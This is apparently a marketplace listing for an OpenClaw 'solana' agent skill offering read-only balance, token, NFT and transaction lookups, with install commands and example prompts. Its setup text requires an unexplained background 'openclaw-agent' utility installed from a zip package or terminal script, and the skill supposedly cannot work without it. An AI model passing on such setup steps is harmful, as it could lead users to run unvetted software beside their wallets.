solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Efficiently interact with Solana with this OpenClaw skill. Check balances, monitor NFTs, analyze transactions, and manage SPL tokens directly from your agent interface.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-kief4What This Skill Does
The Solana skill for OpenClaw provides a comprehensive interface for interacting with the Solana blockchain. It acts as a bridge between the OpenClaw agent and on-chain data, enabling users to query wallet balances, track SPL tokens, monitor NFT metadata, and review transaction histories. By leveraging both the official Solana CLI and custom integration tools like metaboss, this skill allows for both high-level balance checks and granular account analysis. Whether you are managing personal wallets or auditing public addresses, this skill automates complex blockchain queries into simple, actionable CLI commands.
Installation
To begin, ensure you have the openclaw-agent utility installed according to your operating system (Windows via the zip package or macOS via the provided terminal script). Once the agent is operational, install the skill via the OpenClaw hub using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-kief4. Following installation, verify your environment by setting your preferred RPC URL using solana config set --url <RPC_URL>. It is highly recommended to use a reliable public or private RPC provider to ensure consistent connectivity to the mainnet.
Use Cases
This skill is ideal for power users and developers who need to monitor blockchain activity without relying on third-party block explorers. Common use cases include: tracking the real-time balance of specific Phantom or Solflare wallets; auditing individual SPL token holdings to ensure portfolio accuracy; retrieving NFT metadata for decentralized assets; and performing deep-dive transaction analysis via signature confirmation logs. It also serves as a robust tool for developers performing integration testing against devnet, allowing for seamless toggling between network environments via simple configuration updates.
Example Prompts
- "Check the current SOL balance for address 7C4jsPZpB81S1n6T91B7oY6S6M8R8fV7d6M5c1b6a1Q8."
- "List all SPL tokens held by this wallet address and confirm if the account contains any USDC."
- "Show me the last 5 transactions and their status for my vault account 9tG1e2Z8yYx6Pz5K4jA3kH2gD1sF9d8S7qW6e5R4T3Y2."
Tips & Limitations
Always ensure the openclaw-agent process is running in the background, as the skill cannot establish a secure link to the blockchain without it. Note that frequent queries to public RPCs may be rate-limited; for heavy usage, consider using a dedicated private RPC endpoint. When dealing with NFT metadata, ensure the metaboss tool is correctly installed via Cargo, as this is a separate dependency. Finally, keep in mind that blockchain data is public; never share private keys or seed phrases within any prompt, as this skill is designed for viewing public account data only.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-kief4": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.